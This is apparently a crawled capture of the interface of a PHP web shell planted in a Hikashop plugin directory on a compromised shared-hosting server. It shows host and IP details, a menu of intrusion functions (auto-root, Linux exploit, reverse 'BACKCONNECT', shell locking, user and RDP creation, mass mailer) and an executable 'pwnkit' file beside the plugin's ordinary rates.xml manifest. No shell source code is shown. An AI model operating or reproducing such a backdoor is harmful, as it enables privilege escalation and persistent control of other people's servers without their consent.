Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
plugins /
hikashop /
rates /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
cacert.pem
214.45
KB
-rw-r--r--
index.html
44
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rates.php
9.48
KB
-rw-r--r--
rates.xml
2.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rates.xml
<?xml version="1.0" encoding="utf-8"?> <extension type="plugin" version="1.5" method="upgrade" group="hikashop"> <name>Hikashop Currency Rates Plugin</name> <creationDate>29 avril 2022</creationDate> <version>4.5.1</version> <author>Hikashop</author> <authorEmail>dev@hikashop.com</authorEmail> <authorUrl>http://www.hikashop.com</authorUrl> <copyright>(C) 2010-2022 HIKARI SOFTWARE. All rights reserved.</copyright> <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license> <description>This plugin enables you to update rates</description> <files> <filename plugin="rates">rates.php</filename> <filename>cacert.pem</filename> </files> <params addpath="/components/com_hikashop/params"> <param name="frequency" type="text" size="50" default="86400" label="FREQUENCY" description="RATES_FREQUENCY" /> <param name="last_cron_update" type="text" size="50" default="1274903175" label="HIKA_LAST_UPDATE" description="RATES_LAST_UPDATE" /> <param name="source" type="list" default="ecb" label="HIKA_RATES_SOURCE" description="RATES_SOURCE"> <option value="ecb">EUROPEAN_CENTRAL_BANK</option> <option value="openexchangerates">Open Exchange Rates</option> </param> <param name="app_id" type="text" size="50" default="" label="App ID for Open Exchange Rates" description="If you want to use Open Exchange Rates, you need to first sign up on https://openexchangerates.org/ and get your App ID to enter it here" /> </params> <config> <fields name="params" addfieldpath="/components/com_hikashop/fields"> <fieldset name="basic"> <field name="frequency" type="text" label="FREQUENCY" size="50" default="86400" description="RATES_FREQUENCY" /> <field name="last_cron_update" type="text" label="HIKA_LAST_UPDATE" size="50" default="1274903175" description="RATES_LAST_UPDATE" /> <field name="source" type="list" default="ecb" label="HIKA_RATES_SOURCE" description="RATES_SOURCE"> <option value="ecb">EUROPEAN_CENTRAL_BANK</option> <option value="openexchangerates">Open Exchange Rates</option> </field> <field name="app_id" type="text" size="50" default="" label="App ID for Open Exchange Rates" description="If you want to use Open Exchange Rates, you need to first sign up on https://openexchangerates.org/ and get your App ID to enter it here" /> </fieldset> </fields> </config> </extension>
Close